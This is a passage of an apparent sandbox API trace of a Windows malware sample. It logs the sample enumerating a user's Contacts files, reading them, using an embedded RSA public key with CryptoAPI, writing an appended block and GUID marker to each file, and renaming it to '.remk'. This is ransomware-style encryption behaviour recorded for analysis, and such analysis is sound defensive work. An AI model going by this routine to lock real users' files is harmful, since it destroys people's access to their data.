[0230.686] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.687] GetTickCount () returned 0x1139b27 [0230.687] GetCurrentThreadId () returned 0x314 [0230.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.687] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.688] GetTickCount () returned 0x1139b27 [0230.688] GetCurrentThreadId () returned 0x314 [0230.688] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.688] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.688] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.689] GetTickCount () returned 0x1139b27 [0230.689] GetCurrentThreadId () returned 0x314 [0230.689] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.689] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.689] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.690] GetTickCount () returned 0x1139b27 [0230.690] GetCurrentThreadId () returned 0x314 [0230.691] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.691] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.691] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.692] GetTickCount () returned 0x1139b27 [0230.692] GetCurrentThreadId () returned 0x314 [0230.692] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.692] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.692] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.693] GetTickCount () returned 0x1139b27 [0230.693] GetCurrentThreadId () returned 0x314 [0230.693] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.693] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.693] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.694] GetTickCount () returned 0x1139b27 [0230.694] GetCurrentThreadId () returned 0x314 [0230.694] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.694] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.694] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.695] GetTickCount () returned 0x1139b37 [0230.695] GetCurrentThreadId () returned 0x314 [0230.696] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.696] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.696] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.697] GetTickCount () returned 0x1139b37 [0230.697] GetCurrentThreadId () returned 0x314 [0230.697] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.697] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.697] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.698] GetTickCount () returned 0x1139b37 [0230.698] GetCurrentThreadId () returned 0x314 [0230.698] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.698] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.698] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.699] GetTickCount () returned 0x1139b37 [0230.699] GetCurrentThreadId () returned 0x314 [0230.699] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.699] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.699] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.700] GetTickCount () returned 0x1139b37 [0230.700] GetCurrentThreadId () returned 0x314 [0230.700] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.701] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.701] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.702] GetTickCount () returned 0x1139b37 [0230.702] GetCurrentThreadId () returned 0x314 [0230.702] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.702] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.702] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.703] GetTickCount () returned 0x1139b37 [0230.703] GetCurrentThreadId () returned 0x314 [0230.703] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.703] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.703] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.704] GetTickCount () returned 0x1139b37 [0230.704] GetCurrentThreadId () returned 0x314 [0230.704] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.704] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.704] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.705] GetTickCount () returned 0x1139b37 [0230.705] GetCurrentThreadId () returned 0x314 [0230.705] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.706] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.706] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.707] GetTickCount () returned 0x1139b37 [0230.707] GetCurrentThreadId () returned 0x314 [0230.707] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.707] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.707] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.708] GetTickCount () returned 0x1139b37 [0230.708] GetCurrentThreadId () returned 0x314 [0230.708] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.708] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.708] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.709] GetTickCount () returned 0x1139b37 [0230.709] GetCurrentThreadId () returned 0x314 [0230.709] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.709] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.709] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.710] GetTickCount () returned 0x1139b37 [0230.710] GetCurrentThreadId () returned 0x314 [0230.710] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.710] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.710] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.712] GetTickCount () returned 0x1139b46 [0230.712] GetCurrentThreadId () returned 0x314 [0230.712] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.712] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.712] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.713] GetTickCount () returned 0x1139b46 [0230.713] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.714] GetTickCount () returned 0x1139b46 [0230.714] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.715] GetTickCount () returned 0x1139b46 [0230.715] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.716] GetTickCount () returned 0x1139b46 [0230.716] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.717] GetTickCount () returned 0x1139b46 [0230.717] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.719] GetTickCount () returned 0x1139b46 [0230.719] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.720] GetTickCount () returned 0x1139b46 [0230.720] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.721] GetTickCount () returned 0x1139b46 [0230.721] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.722] GetTickCount () returned 0x1139b46 [0230.722] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.723] GetTickCount () returned 0x1139b46 [0230.723] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.724] GetTickCount () returned 0x1139b46 [0230.724] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.725] GetTickCount () returned 0x1139b46 [0230.725] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.726] GetTickCount () returned 0x1139b46 [0230.727] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.728] GetTickCount () returned 0x1139b56 [0230.728] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.729] GetTickCount () returned 0x1139b56 [0230.729] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.730] GetTickCount () returned 0x1139b56 [0230.730] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.731] GetTickCount () returned 0x1139b56 [0230.731] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.732] GetTickCount () returned 0x1139b56 [0230.732] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.733] GetTickCount () returned 0x1139b56 [0230.733] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.734] GetTickCount () returned 0x1139b56 [0230.734] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.735] GetTickCount () returned 0x1139b56 [0230.735] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.736] GetTickCount () returned 0x1139b56 [0230.737] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.738] GetTickCount () returned 0x1139b56 [0230.738] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.739] GetTickCount () returned 0x1139b56 [0230.739] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.740] GetTickCount () returned 0x1139b56 [0230.740] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.741] GetTickCount () returned 0x1139b56 [0230.741] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.742] GetTickCount () returned 0x1139b56 [0230.742] Thread32Next (hSnapshot=0x650, lpte=0x3adf434) returned 1 [0230.743] GetTickCount () returned 0x1139b65 [0230.816] FreeLibrary (hLibModule=0x74ea0000) returned 1 [0230.816] QueryPerformanceCounter (in: lpPerformanceCount=0x3adefa4 | out: lpPerformanceCount=0x3adefa4*=10923673793) returned 1 [0230.816] GlobalMemoryStatus (in: lpBuffer=0x3adf414 | out: lpBuffer=0x3adf414) [0230.828] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x49a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0230.877] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0230.878] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0230.878] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0230.878] CloseHandle (hObject=0x640) returned 1 [0230.883] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.remk")) returned 1 [0230.885] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0230.885] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact") returned=".contact" [0230.885] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0230.886] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=68382) returned 1 [0230.886] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0230.893] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0230.893] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0230.899] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x10b1e, lpOverlapped=0x0) returned 1 [0230.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0230.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0230.901] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0230.901] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0230.902] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0230.902] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0230.903] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0230.903] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0230.903] GetLastError () returned 0x0 [0230.903] SetLastError (dwErrCode=0x0) [0230.903] GetLastError () returned 0x0 [0230.903] SetLastError (dwErrCode=0x0) [0230.903] GetLastError () returned 0x0 [0230.903] SetLastError (dwErrCode=0x0) [0230.903] GetLastError () returned 0x0 [0230.903] SetLastError (dwErrCode=0x0) [0230.903] GetLastError () returned 0x0 [0230.903] SetLastError (dwErrCode=0x0) [0230.903] GetLastError () returned 0x0 [0230.903] SetLastError (dwErrCode=0x0) [0230.903] GetLastError () returned 0x0 [0230.903] SetLastError (dwErrCode=0x0) [0230.903] GetLastError () returned 0x0 [0230.903] SetLastError (dwErrCode=0x0) [0230.903] GetLastError () returned 0x0 [0230.903] SetLastError (dwErrCode=0x0) [0230.903] GetLastError () returned 0x0 [0230.904] SetLastError (dwErrCode=0x0) [0230.904] GetLastError () returned 0x0 [0230.904] SetLastError (dwErrCode=0x0) [0230.904] GetLastError () returned 0x0 [0230.904] SetLastError (dwErrCode=0x0) [0230.904] GetLastError () returned 0x0 [0230.904] SetLastError (dwErrCode=0x0) [0230.904] GetLastError () returned 0x0 [0230.904] SetLastError (dwErrCode=0x0) [0230.904] GetLastError () returned 0x0 [0230.904] SetLastError (dwErrCode=0x0) [0230.904] GetLastError () returned 0x0 [0230.904] SetLastError (dwErrCode=0x0) [0230.904] CryptDestroyHash (hHash=0x31de170) returned 1 [0230.904] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0230.904] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0230.904] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0230.904] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0230.906] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325fd48 [0230.907] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0230.907] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0230.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0230.907] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0230.907] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0230.908] CloseHandle (hObject=0x640) returned 1 [0230.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0230.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b1b70 [0230.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0230.910] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.remk")) returned 1 [0230.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0230.912] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0230.912] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0230.913] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaa5080, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="asdlfk poopvy.contact", cAlternateFileName="ASDLFK~1.CON")) returned 1 [0230.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0230.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0230.913] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0230.914] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned=".contact" [0230.914] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0230.914] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=1171) returned 1 [0230.914] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0230.917] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x46d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0230.917] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0230.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0230.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0230.919] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.920] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x493, lpOverlapped=0x0) returned 1 [0230.920] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0230.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0230.920] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0230.920] lstrlenA (lpString="-----BEGIN PUBLIC 